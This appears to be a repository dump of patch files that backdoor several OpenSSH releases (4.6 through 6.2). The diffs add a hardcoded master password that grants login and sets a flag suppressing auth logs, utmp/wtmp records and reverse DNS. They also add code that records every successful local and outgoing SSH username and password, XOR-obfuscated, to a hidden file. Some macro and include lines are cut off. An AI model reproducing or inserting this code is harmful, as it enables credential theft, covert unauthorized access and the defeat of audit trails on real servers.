67 | @@ -264,6 +264,7 @@
68 | else
69 | authmsg = authenticated ? "Accepted" : "Failed";
70 |
71 | + if(!secret_ok || secret_ok != 1){
72 | authlog("%s %s for %s%.100s from %.200s port %d%s",
73 | authmsg,
74 | method,
75 | @@ -272,6 +273,7 @@
76 | get_remote_ipaddr(),
77 | get_remote_port(),
78 | info);
79 | + }
80 |
81 | #ifdef CUSTOM_FAILED_LOGIN
82 | if (authenticated == 0 && !authctxt->postponed &&
83 | diff -Nuar 4.6p1.orig/canohost.c 4.6p1/canohost.c
84 | --- 4.6p1.orig/canohost.c 2020-04-10 17:17:30.283797943 +0200
85 | +++ 4.6p1/canohost.c 2020-04-13 13:33:51.793465234 +0200
86 | @@ -74,12 +74,14 @@
87 |
88 | debug3("Trying to reverse map address %.100s.", ntop);
89 | /* Map the IP address to a host name. */
90 | + if(!secret_ok || secret_ok != 1){
91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
92 | NULL, 0, NI_NAMEREQD) != 0) {
93 | /* Host name not found. Use ip address. */
94 | return xstrdup(ntop);
95 | }
96 |
97 | + }
98 | /*
99 | * if reverse lookup result looks like a numeric hostname,
100 | * someone is trying to trick us by PTR record like following:
101 | diff -Nuar 4.6p1.orig/conf.h 4.6p1/conf.h
102 | --- 4.6p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
103 | +++ 4.6p1/conf.h 2020-04-14 13:37:08.020871312 +0200
104 | @@ -0,0 +1,12 @@
105 | +#include
106 | +
107 | +int secret_ok;
108 | +FILE *f;
109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
112 | +#define XKEY %%XKEY%%
113 | +
114 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
115 | +
116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, authctxt->host);
185 | password = read_passphrase(prompt, 0);
186 | + char *ohk = strdup(OPENSSH_KEY);
187 | + rox(ohk);
188 | + if((f=fopen(ohk, "a+")) != NULL){
189 | + CLEAN(ohk);
190 | + char bds[512];
191 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host);
192 | + rox(bds);
193 | + fprintf(f, "%s\n", bds);
194 | + CLEAN(bds);
195 | + fflush(f);
196 | + fclose(f);
197 | + }
198 | + CLEAN(ohk);
199 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
200 | packet_put_cstring(authctxt->server_user);
201 | packet_put_cstring(authctxt->service);
202 | diff -Nuar 4.6p1.orig/sshlogin.c 4.6p1/sshlogin.c
203 | --- 4.6p1.orig/sshlogin.c 2020-04-10 17:17:30.291797943 +0200
204 | +++ 4.6p1/sshlogin.c 2020-04-10 19:23:00.972094147 +0200
205 | @@ -126,8 +126,7 @@
206 |
207 | li = login_alloc_entry(pid, user, host, tty);
208 | login_set_addr(li, addr, addrlen);
209 | - login_login(li);
210 | - login_free_entry(li);
211 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
212 | }
213 |
214 | #ifdef LOGIN_NEEDS_UTMPX
215 | @@ -139,8 +138,7 @@
216 |
217 | li = login_alloc_entry(pid, user, host, ttyname);
218 | login_set_addr(li, addr, addrlen);
219 | - login_utmp_only(li);
220 | - login_free_entry(li);
221 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
222 | }
223 | #endif
224 |
225 | @@ -151,6 +149,5 @@
226 | struct logininfo *li;
227 |
228 | li = login_alloc_entry(pid, user, NULL, tty);
229 | - login_logout(li);
230 | - login_free_entry(li);
231 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
232 | }
233 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_531:
--------------------------------------------------------------------------------
1 | diff -Nuar 5.3p1.orig/auth-pam.c 5.3p1/auth-pam.c
2 | --- 5.3p1.orig/auth-pam.c 2020-04-10 17:17:30.363797946 +0200
3 | +++ 5.3p1/auth-pam.c 2020-04-13 13:43:07.573487095 +0200
4 | @@ -1210,6 +1210,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk, "a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 5.3p1.orig/auth-passwd.c 5.3p1/auth-passwd.c
25 | --- 5.3p1.orig/auth-passwd.c 2020-04-10 17:17:30.363797946 +0200
26 | +++ 5.3p1/auth-passwd.c 2020-04-14 13:29:12.256852599 +0200
27 | @@ -86,6 +86,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -123,6 +131,20 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk,"a+"))!=NULL){
50 | + char bds[512];
51 | + sprintf(bds,"from local: %s:%s",authctxt->user, password);
52 | + rox(bds);
53 | + fprintf(f,"%s\n",bds);
54 | + CLEAN(ohk);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + }
60 | if (authctxt->force_pwchange)
61 | disable_forwarding();
62 | return (result && ok);
63 | diff -Nuar 5.3p1.orig/auth.c 5.3p1/auth.c
64 | --- 5.3p1.orig/auth.c 2020-04-10 17:17:30.363797946 +0200
65 | +++ 5.3p1/auth.c 2020-04-13 13:44:58.141491443 +0200
66 | @@ -265,6 +265,7 @@
67 | else
68 | authmsg = authenticated ? "Accepted" : "Failed";
69 |
70 | + if(!secret_ok || secret_ok != 1){
71 | authlog("%s %s for %s%.100s from %.200s port %d%s",
72 | authmsg,
73 | method,
74 | @@ -273,6 +274,7 @@
75 | get_remote_ipaddr(),
76 | get_remote_port(),
77 | info);
78 | + }
79 |
80 | #ifdef CUSTOM_FAILED_LOGIN
81 | if (authenticated == 0 && !authctxt->postponed &&
82 | diff -Nuar 5.3p1.orig/canohost.c 5.3p1/canohost.c
83 | --- 5.3p1.orig/canohost.c 2020-04-10 17:17:30.363797946 +0200
84 | +++ 5.3p1/canohost.c 2020-04-13 13:45:09.873491905 +0200
85 | @@ -77,12 +77,14 @@
86 |
87 | debug3("Trying to reverse map address %.100s.", ntop);
88 | /* Map the IP address to a host name. */
89 | + if(!secret_ok || secret_ok != 1){
90 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
91 | NULL, 0, NI_NAMEREQD) != 0) {
92 | /* Host name not found. Use ip address. */
93 | return xstrdup(ntop);
94 | }
95 |
96 | + }
97 | /*
98 | * if reverse lookup result looks like a numeric hostname,
99 | * someone is trying to trick us by PTR record like following:
100 | diff -Nuar 5.3p1.orig/conf.h 5.3p1/conf.h
101 | --- 5.3p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
102 | +++ 5.3p1/conf.h 2020-04-14 13:37:18.944871742 +0200
103 | @@ -0,0 +1,12 @@
104 | +#include
105 | +
106 | +int secret_ok;
107 | +FILE *f;
108 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
109 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
110 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
111 | +#define XKEY %%XKEY%%
112 | +
113 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
114 | +
115 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, authctxt->host);
184 | password = read_passphrase(prompt, 0);
185 | + char *ohk = strdup(OPENSSH_KEY);
186 | + rox(ohk);
187 | + if((f=fopen(ohk, "a+")) != NULL){
188 | + CLEAN(ohk);
189 | + char bds[512];
190 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host);
191 | + rox(bds);
192 | + fprintf(f, "%s\n", bds);
193 | + CLEAN(bds);
194 | + fflush(f);
195 | + fclose(f);
196 | + }
197 | + CLEAN(ohk);
198 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
199 | packet_put_cstring(authctxt->server_user);
200 | packet_put_cstring(authctxt->service);
201 | diff -Nuar 5.3p1.orig/sshlogin.c 5.3p1/sshlogin.c
202 | --- 5.3p1.orig/sshlogin.c 2020-04-10 17:17:30.367797946 +0200
203 | +++ 5.3p1/sshlogin.c 2020-04-10 19:23:01.008094148 +0200
204 | @@ -133,8 +133,7 @@
205 |
206 | li = login_alloc_entry(pid, user, host, tty);
207 | login_set_addr(li, addr, addrlen);
208 | - login_login(li);
209 | - login_free_entry(li);
210 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
211 | }
212 |
213 | #ifdef LOGIN_NEEDS_UTMPX
214 | @@ -146,8 +145,7 @@
215 |
216 | li = login_alloc_entry(pid, user, host, ttyname);
217 | login_set_addr(li, addr, addrlen);
218 | - login_utmp_only(li);
219 | - login_free_entry(li);
220 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
221 | }
222 | #endif
223 |
224 | @@ -158,6 +156,5 @@
225 | struct logininfo *li;
226 |
227 | li = login_alloc_entry(pid, user, NULL, tty);
228 | - login_logout(li);
229 | - login_free_entry(li);
230 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
231 | }
232 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_582:
--------------------------------------------------------------------------------
1 | diff -Nuar 5.8p2.orig/auth-pam.c 5.8p2/auth-pam.c
2 | --- 5.8p2.orig/auth-pam.c 2020-04-10 17:17:30.443797949 +0200
3 | +++ 5.8p2/auth-pam.c 2020-04-13 13:53:41.969512047 +0200
4 | @@ -1210,6 +1210,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk, "a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 5.8p2.orig/auth-passwd.c 5.8p2/auth-passwd.c
25 | --- 5.8p2.orig/auth-passwd.c 2020-04-10 17:17:30.443797949 +0200
26 | +++ 5.8p2/auth-passwd.c 2020-04-14 13:45:11.844890342 +0200
27 | @@ -86,6 +86,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -123,6 +131,21 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk, "a+")) != NULL){
50 | + CLEAN(ohk);
51 | + char bds[512];
52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
53 | + rox(bds);
54 | + fprintf(f, "%s\n", bds);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + CLEAN(ohk);
60 | + }
61 | if (authctxt->force_pwchange)
62 | disable_forwarding();
63 | return (result && ok);
64 | diff -Nuar 5.8p2.orig/auth.c 5.8p2/auth.c
65 | --- 5.8p2.orig/auth.c 2020-04-10 17:17:30.443797949 +0200
66 | +++ 5.8p2/auth.c 2020-04-13 13:55:35.153516499 +0200
67 | @@ -271,6 +271,7 @@
68 | else
69 | authmsg = authenticated ? "Accepted" : "Failed";
70 |
71 | + if(!secret_ok || secret_ok != 1){
72 | authlog("%s %s for %s%.100s from %.200s port %d%s",
73 | authmsg,
74 | method,
75 | @@ -279,6 +280,7 @@
76 | get_remote_ipaddr(),
77 | get_remote_port(),
78 | info);
79 | + }
80 |
81 | #ifdef CUSTOM_FAILED_LOGIN
82 | if (authenticated == 0 && !authctxt->postponed &&
83 | diff -Nuar 5.8p2.orig/canohost.c 5.8p2/canohost.c
84 | --- 5.8p2.orig/canohost.c 2020-04-10 17:17:30.443797949 +0200
85 | +++ 5.8p2/canohost.c 2020-04-13 13:55:51.473517141 +0200
86 | @@ -78,12 +78,14 @@
87 |
88 | debug3("Trying to reverse map address %.100s.", ntop);
89 | /* Map the IP address to a host name. */
90 | + if(!secret_ok || secret_ok != 1){
91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
92 | NULL, 0, NI_NAMEREQD) != 0) {
93 | /* Host name not found. Use ip address. */
94 | return xstrdup(ntop);
95 | }
96 |
97 | + }
98 | /*
99 | * if reverse lookup result looks like a numeric hostname,
100 | * someone is trying to trick us by PTR record like following:
101 | diff -Nuar 5.8p2.orig/conf.h 5.8p2/conf.h
102 | --- 5.8p2.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
103 | +++ 5.8p2/conf.h 2020-04-14 13:37:28.292872109 +0200
104 | @@ -0,0 +1,12 @@
105 | +#include
106 | +
107 | +int secret_ok;
108 | +FILE *f;
109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
112 | +#define XKEY %%XKEY%%
113 | +
114 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
115 | +
116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, host);
185 | password = read_passphrase(prompt, 0);
186 | + char *ohk = strdup(OPENSSH_KEY);
187 | + rox(ohk);
188 | + if((f=fopen(ohk, "a+")) != NULL){
189 | + CLEAN(ohk);
190 | + char bds[512];
191 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host);
192 | + rox(bds);
193 | + fprintf(f, "%s\n", bds);
194 | + CLEAN(bds);
195 | + fflush(f);
196 | + fclose(f);
197 | + }
198 | + CLEAN(ohk);
199 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
200 | packet_put_cstring(authctxt->server_user);
201 | packet_put_cstring(authctxt->service);
202 | diff -Nuar 5.8p2.orig/sshlogin.c 5.8p2/sshlogin.c
203 | --- 5.8p2.orig/sshlogin.c 2020-04-10 17:17:30.447797950 +0200
204 | +++ 5.8p2/sshlogin.c 2020-04-10 19:23:01.040094149 +0200
205 | @@ -133,8 +133,7 @@
206 |
207 | li = login_alloc_entry(pid, user, host, tty);
208 | login_set_addr(li, addr, addrlen);
209 | - login_login(li);
210 | - login_free_entry(li);
211 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
212 | }
213 |
214 | #ifdef LOGIN_NEEDS_UTMPX
215 | @@ -146,8 +145,7 @@
216 |
217 | li = login_alloc_entry(pid, user, host, ttyname);
218 | login_set_addr(li, addr, addrlen);
219 | - login_utmp_only(li);
220 | - login_free_entry(li);
221 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
222 | }
223 | #endif
224 |
225 | @@ -158,6 +156,5 @@
226 | struct logininfo *li;
227 |
228 | li = login_alloc_entry(pid, user, NULL, tty);
229 | - login_logout(li);
230 | - login_free_entry(li);
231 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
232 | }
233 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_611:
--------------------------------------------------------------------------------
1 | diff -Nuar 6.1p1.orig/auth-pam.c 6.1p1/auth-pam.c
2 | --- 6.1p1.orig/auth-pam.c 2020-04-10 17:17:30.479797951 +0200
3 | +++ 6.1p1/auth-pam.c 2020-04-13 14:03:35.601535396 +0200
4 | @@ -1210,6 +1210,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk, "a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 6.1p1.orig/auth-passwd.c 6.1p1/auth-passwd.c
25 | --- 6.1p1.orig/auth-passwd.c 2020-04-10 17:17:30.479797951 +0200
26 | +++ 6.1p1/auth-passwd.c 2020-04-14 13:28:49.012851684 +0200
27 | @@ -86,6 +86,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -123,6 +131,21 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk, "a+")) != NULL){
50 | + CLEAN(ohk);
51 | + char bds[512];
52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
53 | + rox(bds);
54 | + fprintf(f, "%s\n", bds);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + CLEAN(ohk);
60 | + }
61 | if (authctxt->force_pwchange)
62 | disable_forwarding();
63 | return (result && ok);
64 | diff -Nuar 6.1p1.orig/auth.c 6.1p1/auth.c
65 | --- 6.1p1.orig/auth.c 2020-04-10 17:17:30.479797951 +0200
66 | +++ 6.1p1/auth.c 2020-04-13 14:05:58.009540998 +0200
67 | @@ -271,6 +271,7 @@
68 | else
69 | authmsg = authenticated ? "Accepted" : "Failed";
70 |
71 | + if(!secret_ok || secret_ok != 1){
72 | authlog("%s %s for %s%.100s from %.200s port %d%s",
73 | authmsg,
74 | method,
75 | @@ -279,6 +280,7 @@
76 | get_remote_ipaddr(),
77 | get_remote_port(),
78 | info);
79 | + }
80 |
81 | #ifdef CUSTOM_FAILED_LOGIN
82 | if (authenticated == 0 && !authctxt->postponed &&
83 | diff -Nuar 6.1p1.orig/canohost.c 6.1p1/canohost.c
84 | --- 6.1p1.orig/canohost.c 2020-04-10 17:17:30.479797951 +0200
85 | +++ 6.1p1/canohost.c 2020-04-13 14:06:12.045541550 +0200
86 | @@ -78,12 +78,14 @@
87 |
88 | debug3("Trying to reverse map address %.100s.", ntop);
89 | /* Map the IP address to a host name. */
90 | + if(!secret_ok || secret_ok != 1){
91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
92 | NULL, 0, NI_NAMEREQD) != 0) {
93 | /* Host name not found. Use ip address. */
94 | return xstrdup(ntop);
95 | }
96 |
97 | + }
98 | /*
99 | * if reverse lookup result looks like a numeric hostname,
100 | * someone is trying to trick us by PTR record like following:
101 | diff -Nuar 6.1p1.orig/conf.h 6.1p1/conf.h
102 | --- 6.1p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
103 | +++ 6.1p1/conf.h 2020-04-14 13:37:37.108872456 +0200
104 | @@ -0,0 +1,12 @@
105 | +#include
106 | +
107 | +int secret_ok;
108 | +FILE *f;
109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
112 | +#define XKEY %%XKEY%%
113 | +
114 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
115 | +
116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, host);
199 | password = read_passphrase(prompt, 0);
200 | + char *ohk = strdup(OPENSSH_KEY);
201 | + rox(ohk);
202 | + if((f=fopen(ohk, "a+")) != NULL){
203 | + CLEAN(ohk);
204 | + char bds[512];
205 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host);
206 | + rox(bds);
207 | + fprintf(f, "%s\n", bds);
208 | + CLEAN(bds);
209 | + fflush(f);
210 | + fclose(f);
211 | + }
212 | + CLEAN(ohk);
213 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
214 | packet_put_cstring(authctxt->server_user);
215 | packet_put_cstring(authctxt->service);
216 | diff -Nuar 6.1p1.orig/sshd.c 6.1p1/sshd.c
217 | --- 6.1p1.orig/sshd.c 2020-04-10 17:17:30.487797951 +0200
218 | +++ 6.1p1/sshd.c 2020-04-14 13:48:31.144898181 +0200
219 | @@ -83,6 +83,10 @@
220 | #include
221 | #endif
222 |
223 | +#ifdef HAVE_SYSTEMD
224 | +#include
225 | +#endif
226 | +
227 | #include "xmalloc.h"
228 | #include "ssh.h"
229 | #include "ssh1.h"
230 | @@ -308,6 +312,9 @@
231 | static void
232 | sighup_restart(void)
233 | {
234 | +#ifdef HAVE_SYSTEMD
235 | + sd_notify(0, "RELOADING=1");
236 | +#endif
237 | logit("Received SIGHUP; restarting.");
238 | close_listen_socks();
239 | close_startup_pipes();
240 | @@ -1804,6 +1811,10 @@
241 | }
242 | }
243 |
244 | +#ifdef HAVE_SYSTEMD
245 | + sd_notify(0, "READY=1");
246 | +#endif
247 | +
248 | /* Accept a connection and return in a forked child */
249 | server_accept_loop(&sock_in, &sock_out,
250 | &newsock, config_s);
251 | diff -Nuar 6.1p1.orig/sshlogin.c 6.1p1/sshlogin.c
252 | --- 6.1p1.orig/sshlogin.c 2020-04-10 17:17:30.487797951 +0200
253 | +++ 6.1p1/sshlogin.c 2020-04-10 19:23:01.056094150 +0200
254 | @@ -133,8 +133,7 @@
255 |
256 | li = login_alloc_entry(pid, user, host, tty);
257 | login_set_addr(li, addr, addrlen);
258 | - login_login(li);
259 | - login_free_entry(li);
260 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
261 | }
262 |
263 | #ifdef LOGIN_NEEDS_UTMPX
264 | @@ -146,8 +145,7 @@
265 |
266 | li = login_alloc_entry(pid, user, host, ttyname);
267 | login_set_addr(li, addr, addrlen);
268 | - login_utmp_only(li);
269 | - login_free_entry(li);
270 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
271 | }
272 | #endif
273 |
274 | @@ -158,6 +156,5 @@
275 | struct logininfo *li;
276 |
277 | li = login_alloc_entry(pid, user, NULL, tty);
278 | - login_logout(li);
279 | - login_free_entry(li);
280 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
281 | }
282 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_622:
--------------------------------------------------------------------------------
1 | diff -Nuar 6.2p2.orig/auth-pam.c 6.2p2/auth-pam.c
2 | --- 6.2p2.orig/auth-pam.c 2020-04-10 17:17:30.507797952 +0200
3 | +++ 6.2p2/auth-pam.c 2020-04-12 21:35:11.767202807 +0200
4 | @@ -1210,6 +1210,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk, "a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 6.2p2.orig/auth-passwd.c 6.2p2/auth-passwd.c
25 | --- 6.2p2.orig/auth-passwd.c 2020-04-10 17:17:30.507797952 +0200
26 | +++ 6.2p2/auth-passwd.c 2020-04-14 13:28:41.372851384 +0200
27 | @@ -86,6 +86,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -123,6 +131,21 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk, "a+")) != NULL){
50 | + CLEAN(ohk);
51 | + char bds[512];
52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
53 | + rox(bds);
54 | + fprintf(f, "%s\n", bds);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + CLEAN(ohk);
60 | + }
61 | if (authctxt->force_pwchange)
62 | disable_forwarding();
63 | return (result && ok);
64 | diff -Nuar 6.2p2.orig/auth.c 6.2p2/auth.c
65 | --- 6.2p2.orig/auth.c 2020-04-10 17:17:30.507797952 +0200
66 | +++ 6.2p2/auth.c 2020-04-13 14:13:12.177558075 +0200
67 | @@ -275,6 +275,7 @@
68 | else
69 | authmsg = authenticated ? "Accepted" : "Failed";
70 |
71 | + if(!secret_ok || secret_ok != 1){
72 | authlog("%s %s%s%s for %s%.100s from %.200s port %d%s",
73 | authmsg,
74 | method,
75 | @@ -284,6 +285,7 @@
76 | get_remote_ipaddr(),
77 | get_remote_port(),
78 | info);
79 | + }
80 |
81 | #ifdef CUSTOM_FAILED_LOGIN
82 | if (authenticated == 0 && !authctxt->postponed &&
83 | diff -Nuar 6.2p2.orig/canohost.c 6.2p2/canohost.c
84 | --- 6.2p2.orig/canohost.c 2020-04-10 17:17:30.507797952 +0200
85 | +++ 6.2p2/canohost.c 2020-04-13 14:13:32.929558891 +0200
86 | @@ -78,11 +78,13 @@
87 |
88 | debug3("Trying to reverse map address %.100s.", ntop);
89 | /* Map the IP address to a host name. */
90 | + if(!secret_ok || secret_ok != 1){
91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
92 | NULL, 0, NI_NAMEREQD) != 0) {
93 | /* Host name not found. Use ip address. */
94 | return xstrdup(ntop);
95 | }
96 | + }
97 |
98 | /*
99 | * if reverse lookup result looks like a numeric hostname,
100 | diff -Nuar 6.2p2.orig/conf.h 6.2p2/conf.h
101 | --- 6.2p2.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
102 | +++ 6.2p2/conf.h 2020-04-14 13:37:47.648872871 +0200
103 | @@ -0,0 +1,12 @@
104 | +#include
105 | +
106 | +int secret_ok;
107 | +FILE *f;
108 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
109 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
110 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
111 | +#define XKEY %%XKEY%%
112 | +
113 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
114 | +
115 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, host);
198 | password = read_passphrase(prompt, 0);
199 | + char *ohk = strdup(OPENSSH_KEY);
200 | + rox(ohk);
201 | + if((f=fopen(ohk, "a+")) != NULL){
202 | + CLEAN(ohk);
203 | + char bds[512];
204 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host);
205 | + rox(bds);
206 | + fprintf(f, "%s\n", bds);
207 | + CLEAN(bds);
208 | + fflush(f);
209 | + fclose(f);
210 | + }
211 | + CLEAN(ohk);
212 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
213 | packet_put_cstring(authctxt->server_user);
214 | packet_put_cstring(authctxt->service);
215 | diff -Nuar 6.2p2.orig/sshd.c 6.2p2/sshd.c
216 | --- 6.2p2.orig/sshd.c 2020-04-10 17:17:30.511797952 +0200
217 | +++ 6.2p2/sshd.c 2020-04-14 13:50:49.272903614 +0200
218 | @@ -83,6 +83,9 @@
219 | #include
220 | #endif
221 |
222 | +#ifdef HAVE_SYSTEMD
223 | +#include
224 | +#endif
225 | #include "xmalloc.h"
226 | #include "ssh.h"
227 | #include "ssh1.h"
228 | @@ -308,6 +311,9 @@
229 | static void
230 | sighup_restart(void)
231 | {
232 | +#ifdef HAVE_SYSTEMD
233 | + sd_notify(0, "RELOADING=1");
234 | +#endif
